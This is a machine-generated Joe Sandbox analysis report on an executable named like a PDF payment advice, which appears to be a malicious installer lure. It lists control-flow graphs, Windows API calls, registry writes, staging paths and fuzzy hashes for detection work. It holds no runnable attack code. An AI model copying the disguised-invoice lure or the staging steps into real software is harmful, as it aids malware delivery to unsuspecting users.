                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                • String ID: jA$ jA$... %d%%
                                                                                                                • API String ID: 551687249-2167919867
                                                                                                                • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 755 4025e5-4025fa call 402ba2 758 402600-402607 755->758 759 402a4c-402a4f 755->759 760 402609 758->760 761 40260c-40260f 758->761 762 402a55-402a5b 759->762 760->761 763 402773-40277b 761->763 764 402615-402624 call 405fb5 761->764 763->759 764->763 768 40262a 764->768 769 402630-402634 768->769 770 4026c9-4026cc 769->770 771 40263a-402655 ReadFile 769->771 772 4026e4-4026f4 call 405cad 770->772 773 4026ce-4026d1 770->773 771->763 774 40265b-402660 771->774 772->763 784 4026f6 772->784 773->772 775 4026d3-4026de call 405d0b 773->775 774->763 777 402666-402674 774->777 775->763 775->772 780 40267a-40268c MultiByteToWideChar 777->780 781 40272f-40273b call 405f9c 777->781 780->784 785 40268e-402691 780->785 781->762 788 4026f9-4026fc 784->788 786 402693-40269e 785->786 786->788 789 4026a0-4026c5 SetFilePointer MultiByteToWideChar 786->789 788->781 790 4026fe-402703 788->790 789->786 791 4026c7 789->791 792 402740-402744 790->792 793 402705-40270a 790->793 791->784 794 402761-40276d SetFilePointer 792->794 795 402746-40274a 792->795 793->792 796 40270c-40271f 793->796 794->763 798 402752-40275f 795->798 799 40274c-402750 795->799 796->763 797 402721-402727 796->797 797->769 800 40272d 797->800 798->763 799->794 799->798 800->763
                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                  • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                • String ID: 9
                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 801 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 808 4023c7-4023cf 801->808 809 402a4c-402a5b 801->809 810 4023d1-4023de call 402bbf lstrlenW 808->810 811 4023e2-4023e5 808->811 810->811 814 4023f5-4023f8 811->814 815 4023e7-4023f4 call 402ba2 811->815 819 402409-40241d RegSetValueExW 814->819 820 4023fa-402404 call 403027 814->820 815->814 823 402422-4024fc RegCloseKey 819->823 824 40241f 819->824 820->819 823->809 826 40281e-402825 823->826 824->823 826->809
                                                                                                                APIs
                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv30DA.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv30DA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv30DA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsv30DA.tmp
                                                                                                                • API String ID: 1356686001-2308228590
                                                                                                                • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 827 405683-4056ce CreateDirectoryW 828 4056d0-4056d2 827->828 829 4056d4-4056e1 GetLastError 827->829 830 4056fb-4056fd 828->830 829->830 831 4056e3-4056f7 SetFileSecurityW 829->831 831->828 832 4056f9 GetLastError 831->832 832->830
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 3449924974-3081826266
                                                                                                                • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 833 10001759-10001795 call 10001b18 837 100018a6-100018a8 833->837 838 1000179b-1000179f 833->838 839 100017a1-100017a7 call 10002286 838->839 840 100017a8-100017b5 call 100022d0 838->840 839->840 845 100017e5-100017ec 840->845 846 100017b7-100017bc 840->846 849 1000180c-10001810 845->849 850 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 845->850 847 100017d7-100017da 846->847 848 100017be-100017bf 846->848 847->845 856 100017dc-100017dd call 10002b5f 847->856 852 100017c1-100017c2 848->852 853 100017c7-100017c8 call 100028a4 848->853 854 10001812-1000184c call 100015b4 call 100024a9 849->854 855 1000184e-10001854 call 100024a9 849->855 874 10001855-10001859 850->874 858 100017c4-100017c5 852->858 859 100017cf-100017d5 call 10002645 852->859 865 100017cd 853->865 854->874 855->874 868 100017e2 856->868 858->845 858->853 873 100017e4 859->873 865->868 868->873 873->845 875 10001896-1000189d 874->875 876 1000185b-10001869 call 1000246c 874->876 875->837 881 1000189f-100018a0 GlobalFree 875->881 883 10001881-10001888 876->883 884 1000186b-1000186e 876->884 881->837 883->875 886 1000188a-10001895 call 1000153d 883->886 884->883 885 10001870-10001878 884->885 885->883 887 1000187a-1000187b FreeLibrary 885->887 886->875 887->883
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                  • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1791698881-3916222277
                                                                                                                • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 890 405c59-405c65 891 405c66-405c9a GetTickCount GetTempFileNameW 890->891 892 405ca9-405cab 891->892 893 405c9c-405c9e 891->893 895 405ca3-405ca6 892->895 893->891 894 405ca0 893->894 894->895
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                • API String ID: 1716503409-678247507
                                                                                                                • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 896 4063bf-4063df GetSystemDirectoryW 897 4063e1 896->897 898 4063e3-4063e5 896->898 897->898 899 4063f6-4063f8 898->899 900 4063e7-4063f0 898->900 902 4063f9-406428 wsprintfW LoadLibraryW 899->902 900->899 901 4063f2-4063f4 900->901 901->902
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                • wsprintfW.USER32 ref: 00406411
                                                                                                                • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                • String ID: %s%S.dll
                                                                                                                • API String ID: 2200240437-2744773210
                                                                                                                • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 00405AC2
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                  • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor,?,00000000,000000F0), ref: 00401645
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor, xrefs: 00401638
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor
                                                                                                                • API String ID: 1892508949-1825927138
                                                                                                                • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                  • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 334405425-0
                                                                                                                • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                                • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000048C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv30DA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
